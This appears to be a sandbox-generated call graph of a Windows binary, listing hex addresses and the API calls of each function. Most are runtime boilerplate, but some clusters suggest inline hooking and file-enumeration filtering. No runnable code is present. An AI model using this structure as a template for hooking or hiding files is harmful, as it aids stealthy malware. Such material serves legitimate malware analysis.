7904->7906 7911 2a5af36ea71 7904->7911 7912 2a5af36e972 7904->7912 7905 2a5af368070 _invalid_parameter_noinfo 8 API calls 7907 2a5af36e6a9 7905->7907 7908 2a5af36e969 7906->7908 7906->7911 7907->7866 7907->7871 7909 2a5af36e998 GetCPInfo 7908->7909 7908->7912 7909->7911 7909->7912 7911->7905 7945 2a5af36e344 7912->7945 8043 2a5af36c558 EnterCriticalSection 7913->8043 7930 2a5af36dd9c 7929->7930 7936 2a5af36dd97 7929->7936 7931 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 7930->7931 7930->7936 7932 2a5af36ddb7 7931->7932 7937 2a5af36ffb4 7932->7937 7936->7891 7936->7892 7938 2a5af36ffc9 7937->7938 7940 2a5af36ddda 7937->7940 7939 2a5af370a40 _invalid_parameter_noinfo 14 API calls 7938->7939 7938->7940 7939->7940 7941 2a5af370020 7940->7941 7942 2a5af370035 7941->7942 7944 2a5af370048 7941->7944 7943 2a5af36e8c4 _invalid_parameter_noinfo 14 API calls 7942->7943 7942->7944 7943->7944 7944->7936 7946 2a5af36e38f GetCPInfo 7945->7946 7947 2a5af36e485 7945->7947 7946->7947 7953 2a5af36e3a2 7946->7953 7948 2a5af368070 _invalid_parameter_noinfo 8 API calls 7947->7948 7950 2a5af36e524 7948->7950 7950->7911 7956 2a5af371474 7953->7956 7957 2a5af36dd78 14 API calls 7956->7957 7958 2a5af3714b6 7957->7958 7976 2a5af36ec58 7958->7976 7978 2a5af36ec61 MultiByteToWideChar 7976->7978 8045 2a5af36be9a 8044->8045 8046 2a5af36bec1 8044->8046 8045->7844 8047 2a5af36beea 8046->8047 8048 2a5af36d2a0 __free_lconv_mon 13 API calls 8046->8048 8049 2a5af36d2a0 __free_lconv_mon 13 API calls 8047->8049 8048->8046 8049->8045 9248 2a5af362ab4 TlsGetValue TlsGetValue TlsGetValue 9249 2a5af362b0d 9248->9249 9254 2a5af362b79 9248->9254 9251 2a5af362b15 9249->9251 9249->9254 9250 2a5af362b74 9251->9250 9252 2a5af362c32 TlsSetValue TlsSetValue TlsSetValue 9251->9252 9253 2a5af363f88 StrCmpNIW 9251->9253 9252->9250 9253->9251 9254->9250 9254->9252 9255 2a5af363f88 StrCmpNIW 9254->9255 9255->9254 8656 2a5af36ec30 GetCommandLineA GetCommandLineW 8657 2a5af366430 8658 2a5af36643d 8657->8658 8659 2a5af366449 8658->8659 8665 2a5af36655a 8658->8665 8660 2a5af3664cd 8659->8660 8661 2a5af3664a6 SetThreadContext 8659->8661 8661->8660 8662 2a5af366581 VirtualProtect FlushInstructionCache 8662->8665 8663 2a5af36663e 8664 2a5af36665e 8663->8664 8667 2a5af364b20 VirtualFree 8663->8667 8666 2a5af365530 3 API calls 8664->8666 8665->8662 8665->8663 8668 2a5af366663 8666->8668 8667->8664 8669 2a5af3666b7 8668->8669 8670 2a5af366677 ResumeThread 8668->8670 8671 2a5af368070 _invalid_parameter_noinfo 8 API calls 8669->8671 8670->8668 8672 2a5af3666ff 8671->8672 8431 2a5af371398 8432 2a5af3713ae 8431->8432 8433 2a5af3713f5 8432->8433 8435 2a5af37140e 8432->8435 8434 2a5af36d1f4 __free_lconv_mon 13 API calls 8433->8434 8436 2a5af3713fa 8434->8436 8438 2a5af36dd78 14 API calls 8435->8438 8439 2a5af371405 8435->8439 8437 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8436->8437 8437->8439 8438->8439 8673 2a5af36c218 8674 2a5af36d2a0 __free_lconv_mon 13 API calls 8673->8674 8675 2a5af36c228 8674->8675 8676 2a5af36d2a0 __free_lconv_mon 13 API calls 8675->8676 8677 2a5af36c23c 8676->8677 8678 2a5af36d2a0 __free_lconv_mon 13 API calls 8677->8678 8679 2a5af36c250 8678->8679 8680 2a5af36d2a0 __free_lconv_mon 13 API calls 8679->8680 8681 2a5af36c264 8680->8681 8050 2a5af362518 GetProcessIdOfThread GetCurrentProcessId 8051 2a5af362543 CreateFileW 8050->8051 8052 2a5af3625be 8050->8052 8051->8052 8053 2a5af362577 WriteFile ReadFile CloseHandle 8051->8053 8053->8052 8682 2a5af36f820 8685 2a5af36f7d8 8682->8685 8690 2a5af36c558 EnterCriticalSection 8685->8690 8691 2a5af36fe20 8692 2a5af36fe4a 8691->8692 8693 2a5af36d220 __free_lconv_mon 13 API calls 8692->8693 8694 2a5af36fe6a 8693->8694 8695 2a5af36d2a0 __free_lconv_mon 13 API calls 8694->8695 8696 2a5af36fe78 8695->8696 8697 2a5af36d220 __free_lconv_mon 13 API calls 8696->8697 8700 2a5af36fea2 8696->8700 8699 2a5af36fe94 8697->8699 8698 2a5af36fec1 InitializeCriticalSectionEx 8698->8700 8701 2a5af36d2a0 __free_lconv_mon 13 API calls 8699->8701 8700->8698 8702 2a5af36feab 8700->8702 8701->8700 8054 2a5af364320 8057 2a5af36426d 8054->8057 8055 2a5af3642d7 8056 2a5af3642bd VirtualQuery 8056->8055 8056->8057 8057->8055 8057->8056 8058 2a5af364322 GetLastError 8057->8058 8058->8057 8440 2a5af37479d 8443 2a5af36af34 8440->8443 8444 2a5af36af4e 8443->8444 8446 2a5af36af9b 8443->8446 8445 2a5af369324 _CreateFrameInfo 9 API calls 8444->8445 8444->8446 8445->8446 8059 2a5af368f0c 8066 2a5af36946c 8059->8066 8062 2a5af368f19 8068 2a5af369474 8066->8068 8069 2a5af3694a5 8068->8069 8070 2a5af368f15 8068->8070 8083 2a5af369d28 8068->8083 8071 2a5af3694b4 __vcrt_uninitialize_locks DeleteCriticalSection 8069->8071 8070->8062 8072 2a5af369400 8070->8072 8071->8070 8097 2a5af369bfc 8072->8097 8088 2a5af369aac 8083->8088 8086 2a5af369d68 8086->8068 8087 2a5af369d73 InitializeCriticalSectionAndSpinCount 8087->8086 8089 2a5af369b96 8088->8089 8095 2a5af369af0 __vcrt_InitializeCriticalSectionEx 8088->8095 8089->8086 8089->8087 8090 2a5af369b1e LoadLibraryExW 8092 2a5af369b3f GetLastError 8090->8092 8093 2a5af369bbd 8090->8093 8091 2a5af369bdd GetProcAddress 8091->8089 8092->8095 8093->8091 8094 2a5af369bd4 FreeLibrary 8093->8094 8094->8091 8095->8089 8095->8090 8095->8091 8096 2a5af369b61 LoadLibraryExW 8095->8096 8096->8093 8096->8095 8098 2a5af369aac __vcrt_InitializeCriticalSectionEx 5 API calls 8097->8098 8099 2a5af369c21 TlsAlloc 8098->8099 8703 2a5af36820c 8710 2a5af368f34 8703->8710 8706 2a5af368219 8711 2a5af369340 _CreateFrameInfo 9 API calls 8710->8711 8712 2a5af368215 8711->8712 8712->8706 8713 2a5af36c288 8712->8713 8714 2a5af36cb10 __free_lconv_mon 13 API calls 8713->8714 8715 2a5af368222 8714->8715 8715->8706 8716 2a5af368f48 8715->8716 8719 2a5af3692dc 8716->8719 8718 2a5af368f51 8718->8706 8720 2a5af369302 8719->8720 8721 2a5af3692ed 8719->8721 8720->8718 8722 2a5af369c8c _CreateFrameInfo 6 API calls 8721->8722 8723 2a5af3692f2 8722->8723 8725 2a5af369cd4 8723->8725 8726 2a5af369aac __vcrt_InitializeCriticalSectionEx 5 API calls 8725->8726 8727 2a5af369d02 8726->8727 8728 2a5af369d0c 8727->8728 8729 2a5af369d14 TlsSetValue 8727->8729 8728->8720 8729->8728 8730 2a5af374611 __scrt_dllmain_exception_filter 8101 2a5af36c510 8102 2a5af36c518 8101->8102 8103 2a5af36c545 8102->8103 8105 2a5af36c574 8102->8105 8106 2a5af36c59f 8105->8106 8107 2a5af36c5a3 8106->8107 8108 2a5af36c582 DeleteCriticalSection 8106->8108 8107->8103 8108->8106 9279 2a5af365c8d 9280 2a5af365c94 9279->9280 9281 2a5af365cfb 9280->9281 9282 2a5af365d77 VirtualProtect 9280->9282 9283 2a5af365da3 GetLastError 9282->9283 9284 2a5af365db1 9282->9284 9283->9284 8447 2a5af36cbfc 8452 2a5af36f3a0 8447->8452 8449 2a5af36cc05 8450 2a5af36cb10 __free_lconv_mon 13 API calls 8449->8450 8451 2a5af36cc22 __vcrt_uninitialize_ptd 8449->8451 8450->8451 8453 2a5af36f3b5 8452->8453 8454 2a5af36f3b1 8452->8454 8453->8454 8455 2a5af36ef88 9 API calls 8453->8455 8454->8449 8455->8454 8731 2a5af37387c 8732 2a5af3738b4 __GSHandlerCheckCommon 8731->8732 8733 2a5af3738e0 8732->8733 8735 2a5af369a24 8732->8735 8736 2a5af369324 _CreateFrameInfo 9 API calls 8735->8736 8737 2a5af369a4e 8736->8737 8738 2a5af369324 _CreateFrameInfo 9 API calls 8737->8738 8739 2a5af369a5b 8738->8739 8740 2a5af369324 _CreateFrameInfo 9 API calls 8739->8740 8741 2a5af369a64 8740->8741 8741->8733 8456 2a5af3641f9 8459 2a5af364146 8456->8459 8457 2a5af3641b0 8458 2a5af364196 VirtualQuery 8458->8457 8458->8459 8459->8457 8459->8458 8460 2a5af3641ca VirtualAlloc 8459->8460 8460->8457 8461 2a5af3641fb GetLastError 8460->8461 8461->8457 8461->8459 8462 2a5af365ff9 8463 2a5af366000 VirtualProtect 8462->8463 8464 2a5af366029 GetLastError 8463->8464 8465 2a5af365f10 8463->8465 8464->8465 9285 2a5af3746f5 9286 2a5af369324 _CreateFrameInfo 9 API calls 9285->9286 9287 2a5af37470d 9286->9287 9288 2a5af369324 _CreateFrameInfo 9 API calls 9287->9288 9289 2a5af374728 9288->9289 9290 2a5af369324 _CreateFrameInfo 9 API calls 9289->9290 9291 2a5af37473c 9290->9291 9292 2a5af369324 _CreateFrameInfo 9 API calls 9291->9292 9293 2a5af37477e 9292->9293 8109 2a5af36c180 8112 2a5af36bf38 8109->8112 8119 2a5af36bf00 8112->8119 8117 2a5af36bebc 13 API calls 8118 2a5af36bf6b 8117->8118 8120 2a5af36bf15 8119->8120 8121 2a5af36bf10 8119->8121 8123 2a5af36bf1c 8120->8123 8122 2a5af36bebc 13 API calls 8121->8122 8122->8120 8124 2a5af36bf2c 8123->8124 8125 2a5af36bf31 8123->8125 8126 2a5af36bebc 13 API calls 8124->8126 8125->8117 8126->8125 9294 2a5af36b500 9299 2a5af36c558 EnterCriticalSection 9294->9299 9300 2a5af362300 9301 2a5af362331 9300->9301 9302 2a5af362412 9301->9302 9303 2a5af362447 9301->9303 9309 2a5af362355 9301->9309 9304 2a5af3624bb 9303->9304 9305 2a5af36244c 9303->9305 9304->9302 9308 2a5af3635c8 11 API calls 9304->9308 9317 2a5af3635c8 GetProcessHeap HeapAlloc 9305->9317 9307 2a5af36238d StrCmpNIW 9307->9309 9308->9302 9309->9302 9309->9307 9311 2a5af361d30 9309->9311 9312 2a5af361d57 GetProcessHeap HeapAlloc 9311->9312 9313 2a5af361db4 9311->9313 9312->9313 9314 2a5af361d92 9312->9314 9313->9309 9315 2a5af361cfc 2 API calls 9314->9315 9316 2a5af361d9a GetProcessHeap HeapFree 9315->9316 9316->9313 9320 2a5af36361b 9317->9320 9318 2a5af3636d9 GetProcessHeap HeapFree 9318->9302 9319 2a5af3636d4 9319->9318 9320->9318 9320->9319 9321 2a5af363666 StrCmpNIW 9320->9321 9322 2a5af361d30 6 API calls 9320->9322 9321->9320 9322->9320 8466 2a5af36b7ea 8467 2a5af36c2f4 14 API calls 8466->8467 8468 2a5af36b7ef 8467->8468 8469 2a5af36b815 GetModuleHandleW 8468->8469 8470 2a5af36b85f 8468->8470 8469->8470 8474 2a5af36b822 8469->8474 8483 2a5af36b6f8 8470->8483 8474->8470 8478 2a5af36b904 GetModuleHandleExW 8474->8478 8479 2a5af36b938 GetProcAddress 8478->8479 8482 2a5af36b94a 8478->8482 8479->8482 8480 2a5af36b95b FreeLibrary 8481 2a5af36b962 8480->8481 8481->8470 8482->8480 8482->8481 8495 2a5af36c558 EnterCriticalSection 8483->8495 8496 2a5af3627e8 8498 2a5af362867 8496->8498 8497 2a5af362998 8498->8497 8499 2a5af3628c9 GetFileType 8498->8499 8500 2a5af3628d7 StrCpyW 8499->8500 8501 2a5af3628ed 8499->8501 8502 2a5af3628fc 8500->8502 8512 2a5af361ad4 GetFinalPathNameByHandleW 8501->8512 8506 2a5af36299d 8502->8506 8510 2a5af362906 8502->8510 8504 2a5af363f88 StrCmpNIW 8504->8506 8505 2a5af363f88 StrCmpNIW 8505->8510 8506->8497 8506->8504 8507 2a5af363708 4 API calls 8506->8507 8508 2a5af361dd4 2 API calls 8506->8508 8507->8506 8508->8506 8510->8497 8510->8505 8517 2a5af363708 StrCmpIW 8510->8517 8521 2a5af361dd4 8510->8521 8513 2a5af361b3d 8512->8513 8514 2a5af361afe StrCmpNIW 8512->8514 8513->8502 8514->8513 8515 2a5af361b18 lstrlenW 8514->8515 8515->8513 8516 2a5af361b2a StrCpyW 8515->8516 8516->8513 8518 2a5af36373a StrCpyW StrCatW 8517->8518 8519 2a5af363751 PathCombineW 8517->8519 8520 2a5af36375a 8518->8520 8519->8520 8520->8510 8522 2a5af361deb 8521->8522 8523 2a5af361df4 8521->8523 8524 2a5af361530 2 API calls 8522->8524 8523->8510 8524->8523 8127 2a5af365974 8128 2a5af36597a 8127->8128 8139 2a5af367fa0 8128->8139 8133 2a5af365a77 8135 2a5af365bfd 8133->8135 8138 2a5af3659de 8133->8138 8152 2a5af367b80 8133->8152 8134 2a5af365cfb 8135->8134 8136 2a5af365d77 VirtualProtect 8135->8136 8137 2a5af365da3 GetLastError 8136->8137 8136->8138 8137->8138 8140 2a5af367fab 8139->8140 8141 2a5af3659bd 8140->8141 8142 2a5af36b470 __free_lconv_mon 2 API calls 8140->8142 8143 2a5af367fca 8140->8143 8141->8138 8148 2a5af364400 8141->8148 8142->8140 8144 2a5af367fd5 8143->8144 8158 2a5af3687b8 8143->8158 8162 2a5af3687d8 8144->8162 8149 2a5af36441d 8148->8149 8151 2a5af36448c 8149->8151 8171 2a5af364670 8149->8171 8151->8133 8153 2a5af367bc7 8152->8153 8196 2a5af367950 8153->8196 8156 2a5af368070 _invalid_parameter_noinfo 8 API calls 8157 2a5af367bf1 8156->8157 8157->8133 8159 2a5af3687c6 std::bad_alloc::bad_alloc 8158->8159 8166 2a5af369178 8159->8166 8161 2a5af3687d7 8163 2a5af3687e6 std::bad_alloc::bad_alloc 8162->8163 8164 2a5af369178 Concurrency::cancel_current_task 2 API calls 8163->8164 8165 2a5af367fdb 8164->8165 8167 2a5af369197 8166->8167 8168 2a5af3691e2 RaiseException 8167->8168 8169 2a5af3691c0 RtlPcToFileHeader 8167->8169 8168->8161 8170 2a5af3691d8 8169->8170 8170->8168 8172 2a5af364694 8171->8172 8174 2a5af3646b7 8171->8174 8172->8174 8185 2a5af364120 8172->8185 8175 2a5af3646ed 8174->8175 8191 2a5af364250 8174->8191 8176 2a5af36471d 8175->8176 8179 2a5af364250 2 API calls 8175->8179 8177 2a5af364753 8176->8177 8181 2a5af364120 3 API calls 8176->8181 8180 2a5af36476f 8177->8180 8182 2a5af364120 3 API calls 8177->8182 8179->8176 8183 2a5af36478b 8180->8183 8184 2a5af364250 2 API calls 8180->8184 8181->8177 8182->8180 8183->8151 8184->8183 8188 2a5af364141 8185->8188 8186 2a5af3641b0 8186->8174 8187 2a5af364196 VirtualQuery 8187->8186 8187->8188 8188->8186 8188->8187 8189 2a5af3641ca VirtualAlloc 8188->8189 8189->8186 8190 2a5af3641fb GetLastError 8189->8190 8190->8186 8190->8188 8192 2a5af364268 8191->8192 8193 2a5af3642bd VirtualQuery 8192->8193 8194 2a5af3642d7 8192->8194 8195 2a5af364322 GetLastError 8192->8195 8193->8192 8193->8194 8194->8175 8195->8192 8197 2a5af36796b 8196->8197 8198 2a5af367981 SetLastError 8197->8198 8199 2a5af36798f 8197->8199 8198->8199 8199->8156 8750 2a5af368672 8751 2a5af3690c0 __std_exception_copy 38 API calls 8750->8751 8752 2a5af36869d 8751->8752 8200 2a5af36f370 VirtualProtect 8753 2a5af36f870 8754 2a5af36f8a0 8753->8754 8756 2a5af36f8c7 8753->8756 8755 2a5af36cb10 __free_lconv_mon 13 API calls 8754->8755 8754->8756 8760 2a5af36f8b4 8754->8760 8755->8760 8757 2a5af36f99c 8756->8757 8776 2a5af36c558 EnterCriticalSection 8756->8776 8761 2a5af36fab3 8757->8761 8763 2a5af36fa03 8757->8763 8769 2a5af36f9ca 8757->8769 8758 2a5af36f904 8760->8756 8760->8758 8762 2a5af36f949 8760->8762 8764 2a5af36fac0 8761->8764 8778 2a5af36c5ac LeaveCriticalSection 8761->8778 8765 2a5af36d1f4 __free_lconv_mon 13 API calls 8762->8765 8773 2a5af36fa61 8763->8773 8777 2a5af36c5ac LeaveCriticalSection 8763->8777 8768 2a5af36f94e 8765->8768 8771 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8768->8771 8769->8763 8772 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 8769->8772 8770 2a5af36cab0 14 API calls _invalid_parameter_noinfo 8770->8773 8771->8758 8774 2a5af36f9f3 8772->8774 8773->8770 8775 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 8774->8775 8775->8763 8525 2a5af362ff0 8526 2a5af363061 8525->8526 8527 2a5af363384 8526->8527 8528 2a5af36308d GetModuleHandleA 8526->8528 8529 2a5af3630b1 8528->8529 8530 2a5af36309f GetProcAddress 8528->8530 8529->8527 8531 2a5af3630d8 StrCmpNIW 8529->8531 8530->8529 8531->8527 8537 2a5af3630fd 8531->8537 8532 2a5af361a30 6 API calls 8532->8537 8533 2a5af3632b9 lstrlenW 8533->8537 8534 2a5af36320f lstrlenW 8534->8537 8535 2a5af361cfc StrCmpIW StrCmpW 8535->8537 8536 2a5af363f88 StrCmpNIW 8536->8537 8537->8527 8537->8532 8537->8533 8537->8534 8537->8535 8537->8536 9326 2a5af36f6dc 9327 2a5af36f6e8 9326->9327 9329 2a5af36f70f 9327->9329 9330 2a5af371c0c 9327->9330 9331 2a5af371c4c 9330->9331 9332 2a5af371c11 9330->9332 9331->9327 9333 2a5af371c44 9332->9333 9334 2a5af371c32 DeleteCriticalSection 9332->9334 9335 2a5af36d2a0 __free_lconv_mon 13 API calls 9333->9335 9334->9333 9334->9334 9335->9331 8538 2a5af3625dc 8539 2a5af36265a 8538->8539 8540 2a5af3626bf GetFileType 8539->8540 8548 2a5af362777 8539->8548 8541 2a5af3626e1 8540->8541 8542 2a5af3626cd StrCpyW 8540->8542 8543 2a5af361ad4 4 API calls 8541->8543 8544 2a5af3626ee 8542->8544 8543->8544 8545 2a5af363f88 StrCmpNIW 8544->8545 8546 2a5af363708 4 API calls 8544->8546 8547 2a5af361dd4 2 API calls 8544->8547 8544->8548 8545->8544 8546->8544 8547->8544 8549 2a5af36c1d8 8550 2a5af36c1f1 8549->8550 8552 2a5af36c209 8549->8552 8551 2a5af36d2a0 __free_lconv_mon 13 API calls 8550->8551 8550->8552 8551->8552 8779 2a5af36d658 8780 2a5af36d67d 8779->8780 8788 2a5af36d694 8779->8788 8781 2a5af36d1f4 __free_lconv_mon 13 API calls 8780->8781 8782 2a5af36d682 8781->8782 8784 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8782->8784 8783 2a5af36d724 8785 2a5af36bb54 13 API calls 8783->8785 8786 2a5af36d68d 8784->8786 8787 2a5af36d77c 8785->8787 8790 2a5af36d784 8787->8790 8799 2a5af36d7d7 8787->8799 8788->8783 8794 2a5af36d6da 8788->8794 8796 2a5af36d7b6 8788->8796 8812 2a5af36d894 8788->8812 8874 2a5af36da18 8788->8874 8793 2a5af36d2a0 __free_lconv_mon 13 API calls 8790->8793 8792 2a5af36d836 8797 2a5af36d2a0 __free_lconv_mon 13 API calls 8792->8797 8795 2a5af36d78b 8793->8795 8798 2a5af36d6fd 8794->8798 8802 2a5af36d2a0 __free_lconv_mon 13 API calls 8794->8802 8795->8798 8803 2a5af36d2a0 __free_lconv_mon 13 API calls 8795->8803 8796->8798 8801 2a5af36d2a0 __free_lconv_mon 13 API calls 8796->8801 8800 2a5af36d841 8797->8800 8804 2a5af36d2a0 __free_lconv_mon 13 API calls 8798->8804 8799->8792 8799->8799 8809 2a5af36d87c 8799->8809 8911 2a5af370eb8 8799->8911 8805 2a5af36d85a 8800->8805 8808 2a5af36d2a0 __free_lconv_mon 13 API calls 8800->8808 8801->8796 8802->8794 8803->8795 8804->8786 8806 2a5af36d2a0 __free_lconv_mon 13 API calls 8805->8806 8806->8786 8808->8800 8810 2a5af36d06c _invalid_parameter_noinfo 17 API calls 8809->8810 8811 2a5af36d891 8810->8811 8813 2a5af36d8c2 8812->8813 8813->8813 8814 2a5af36d8de 8813->8814 8815 2a5af36d220 __free_lconv_mon 13 API calls 8813->8815 8814->8788 8816 2a5af36d90d 8815->8816 8817 2a5af36d926 8816->8817 8819 2a5af370eb8 38 API calls 8816->8819 8818 2a5af370eb8 38 API calls 8817->8818 8821 2a5af36d9fc 8817->8821 8820 2a5af36d943 8818->8820 8819->8817 8820->8821 8822 2a5af36d97f 8820->8822 8824 2a5af36d962 8820->8824 8825 2a5af36d98d 8820->8825 8823 2a5af36d06c _invalid_parameter_noinfo 17 API calls 8821->8823 8827 2a5af36d2a0 __free_lconv_mon 13 API calls 8822->8827 8835 2a5af36da17 8823->8835 8826 2a5af36d220 __free_lconv_mon 13 API calls 8824->8826 8828 2a5af36d977 8825->8828 8920 2a5af36eee0 8825->8920 8830 2a5af36d96d 8826->8830 8827->8821 8828->8822 8829 2a5af36d2a0 __free_lconv_mon 13 API calls 8828->8829 8829->8822 8833 2a5af36d2a0 __free_lconv_mon 13 API calls 8830->8833 8832 2a5af36da7a 8837 2a5af36da8c 8832->8837 8843 2a5af36daa1 8832->8843 8833->8828 8834 2a5af36d9b5 8838 2a5af36d9ba 8834->8838 8839 2a5af36d9d0 8834->8839 8835->8832 8929 2a5af3713d8 8835->8929 8841 2a5af36d894 52 API calls 8837->8841 8842 2a5af36d2a0 __free_lconv_mon 13 API calls 8838->8842 8840 2a5af36d2a0 __free_lconv_mon 13 API calls 8839->8840 8840->8822 8869 2a5af36da9c 8841->8869 8842->8828 8845 2a5af36dd78 14 API calls 8843->8845 8844 2a5af368070 _invalid_parameter_noinfo 8 API calls 8846 2a5af36dd64 8844->8846 8847 2a5af36db0b 8845->8847 8846->8788 8848 2a5af36db1a 8847->8848 8849 2a5af36f198 9 API calls 8847->8849 8938 2a5af36d30c 8848->8938 8849->8848 8852 2a5af36dba8 8853 2a5af36d894 52 API calls 8852->8853 8855 2a5af36dbb8 8853->8855 8854 2a5af36dd78 14 API calls 8858 2a5af36dbd2 8854->8858 8856 2a5af36d2a0 __free_lconv_mon 13 API calls 8855->8856 8855->8869 8856->8869 8857 2a5af36f198 9 API calls 8857->8858 8858->8854 8858->8857 8860 2a5af36d894 52 API calls 8858->8860 8861 2a5af36dcc8 FindNextFileW 8858->8861 8862 2a5af36d2a0 13 API calls __free_lconv_mon 8858->8862 8863 2a5af36dd2a 8858->8863 8960 2a5af36d4ac 8858->8960 8860->8858 8861->8858 8865 2a5af36dce0 8861->8865 8862->8858 8866 2a5af36dd38 FindClose 8863->8866 8870 2a5af36d2a0 __free_lconv_mon 13 API calls 8863->8870 8864 2a5af36dd0c FindClose 8868 2a5af36dd1c 8864->8868 8864->8869 8865->8864 8982 2a5af370b20 8865->8982 8866->8869 8871 2a5af36dd48 8866->8871 8872 2a5af36d2a0 __free_lconv_mon 13 API calls 8868->8872 8869->8844 8870->8866 8873 2a5af36d2a0 __free_lconv_mon 13 API calls 8871->8873 8872->8869 8873->8869 8875 2a5af36da7a 8874->8875 8876 2a5af36da58 8874->8876 8878 2a5af36da8c 8875->8878 8880 2a5af36daa1 8875->8880 8876->8875 8877 2a5af3713d8 38 API calls 8876->8877 8877->8876 8879 2a5af36d894 56 API calls 8878->8879 8893 2a5af36da9c 8879->8893 8882 2a5af36dd78 14 API calls 8880->8882 8881 2a5af368070 _invalid_parameter_noinfo 8 API calls 8883 2a5af36dd64 8881->8883 8884 2a5af36db0b 8882->8884 8883->8788 8885 2a5af36db1a 8884->8885 8886 2a5af36f198 9 API calls 8884->8886 8887 2a5af36d30c 16 API calls 8885->8887 8886->8885 8888 2a5af36db7b FindFirstFileExW 8887->8888 8889 2a5af36dba8 8888->8889 8899 2a5af36dbd2 8888->8899 8890 2a5af36d894 56 API calls 8889->8890 8892 2a5af36dbb8 8890->8892 8891 2a5af36dd78 14 API calls 8891->8899 8892->8893 8894 2a5af36d2a0 __free_lconv_mon 13 API calls 8892->8894 8893->8881 8894->8893 8895 2a5af36f198 9 API calls 8895->8899 8896 2a5af36d4ac 16 API calls 8896->8899 8897 2a5af36d894 56 API calls 8897->8899 8898 2a5af36dcc8 FindNextFileW 8898->8899 8900 2a5af36dce0 8898->8900 8899->8891 8899->8895 8899->8896 8899->8897 8899->8898 8901 2a5af36d2a0 13 API calls __free_lconv_mon 8899->8901 8902 2a5af36dd2a 8899->8902 8903 2a5af36dd0c FindClose 8900->8903 8905 2a5af370b20 38 API calls 8900->8905 8901->8899 8904 2a5af36dd38 FindClose 8902->8904 8907 2a5af36d2a0 __free_lconv_mon 13 API calls 8902->8907 8903->8893 8906 2a5af36dd1c 8903->8906 8904->8893 8908 2a5af36dd48 8904->8908 8905->8903 8909 2a5af36d2a0 __free_lconv_mon 13 API calls 8906->8909 8907->8904 8910 2a5af36d2a0 __free_lconv_mon 13 API calls 8908->8910 8909->8893 8910->8893 8914 2a5af370ed5 8911->8914 8912 2a5af370eda 8913 2a5af36d1f4 __free_lconv_mon 13 API calls 8912->8913 8917 2a5af370ef0 8912->8917 8919 2a5af370ee4 8913->8919 8914->8912 8915 2a5af370f24 8914->8915 8914->8917 8915->8917 8918 2a5af36d1f4 __free_lconv_mon 13 API calls 8915->8918 8916 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8916->8917 8917->8799 8918->8919 8919->8916 8921 2a5af36ef02 8920->8921 8922 2a5af36ef1f 8920->8922 8921->8922 8923 2a5af36ef10 8921->8923 8926 2a5af36ef29 8922->8926 8990 2a5af3719f0 8922->8990 8924 2a5af36d1f4 __free_lconv_mon 13 API calls 8923->8924 8928 2a5af36ef15 8924->8928 8997 2a5af371a40 8926->8997 8928->8834 8930 2a5af3713e0 8929->8930 8931 2a5af3713f5 8930->8931 8933 2a5af37140e 8930->8933 8932 2a5af36d1f4 __free_lconv_mon 13 API calls 8931->8932 8934 2a5af3713fa 8932->8934 8936 2a5af36dd78 14 API calls 8933->8936 8937 2a5af371405 8933->8937 8935 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8934->8935 8935->8937 8936->8937 8937->8835 8939 2a5af36d35a 8938->8939 8940 2a5af36d336 8938->8940 8941 2a5af36d3bf 8939->8941 8944 2a5af36d35f 8939->8944 8943 2a5af36d2a0 __free_lconv_mon 13 API calls 8940->8943 8951 2a5af36d345 FindFirstFileExW 8940->8951 8942 2a5af36ec58 MultiByteToWideChar 8941->8942 8954 2a5af36d3db 8942->8954 8943->8951 8945 2a5af36d374 8944->8945 8947 2a5af36d2a0 __free_lconv_mon 13 API calls 8944->8947 8944->8951 8948 2a5af36c5d0 14 API calls 8945->8948 8946 2a5af36d3e2 GetLastError 8949 2a5af36d184 13 API calls 8946->8949 8947->8945 8948->8951 8953 2a5af36d3ef 8949->8953 8950 2a5af36d420 8950->8951 8952 2a5af36ec58 MultiByteToWideChar 8950->8952 8951->8852 8951->8858 8956 2a5af36d47a 8952->8956 8957 2a5af36d1f4 __free_lconv_mon 13 API calls 8953->8957 8954->8946 8954->8950 8955 2a5af36d413 8954->8955 8958 2a5af36d2a0 __free_lconv_mon 13 API calls 8954->8958 8959 2a5af36c5d0 14 API calls 8955->8959 8956->8946 8956->8951 8957->8951 8958->8955 8959->8950 8961 2a5af36d4fa 8960->8961 8962 2a5af36d4d6 8960->8962 8963 2a5af36d500 8961->8963 8964 2a5af36d55f 8961->8964 8965 2a5af36d2a0 __free_lconv_mon 13 API calls 8962->8965 8968 2a5af36d4e5 8962->8968 8967 2a5af36d515 8963->8967 8963->8968 8970 2a5af36d2a0 __free_lconv_mon 13 API calls 8963->8970 8966 2a5af36ece8 WideCharToMultiByte 8964->8966 8965->8968 8969 2a5af36d583 8966->8969 8971 2a5af36c5d0 14 API calls 8967->8971 8968->8858 8972 2a5af36d58a GetLastError 8969->8972 8974 2a5af36d5bb 8969->8974 8977 2a5af36d2a0 __free_lconv_mon 13 API calls 8969->8977 8981 2a5af36d5c7 8969->8981 8970->8967 8971->8968 8973 2a5af36d184 13 API calls 8972->8973 8976 2a5af36d597 8973->8976 8978 2a5af36c5d0 14 API calls 8974->8978 8975 2a5af36ece8 WideCharToMultiByte 8979 2a5af36d629 8975->8979 8980 2a5af36d1f4 __free_lconv_mon 13 API calls 8976->8980 8977->8974 8978->8981 8979->8968 8979->8972 8980->8968 8981->8968 8981->8975 8983 2a5af370b52 8982->8983 8984 2a5af36d1f4 __free_lconv_mon 13 API calls 8983->8984 8987 2a5af370b67 8983->8987 8985 2a5af370b5c 8984->8985 8986 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8985->8986 8986->8987 8988 2a5af368070 _invalid_parameter_noinfo 8 API calls 8987->8988 8989 2a5af370ea8 8988->8989 8989->8864 8991 2a5af3719f9 8990->8991 8992 2a5af371a12 HeapSize 8990->8992 8993 2a5af36d1f4 __free_lconv_mon 13 API calls 8991->8993 8994 2a5af3719fe 8993->8994 8995 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8994->8995 8996 2a5af371a09 8995->8996 8996->8926 8998 2a5af371a55 8997->8998 8999 2a5af371a5f 8997->8999 9000 2a5af36c5d0 14 API calls 8998->9000 9001 2a5af371a64 8999->9001 9007 2a5af371a6b __free_lconv_mon 8999->9007 9005 2a5af371a5d 9000->9005 9002 2a5af36d2a0 __free_lconv_mon 13 API calls 9001->9002 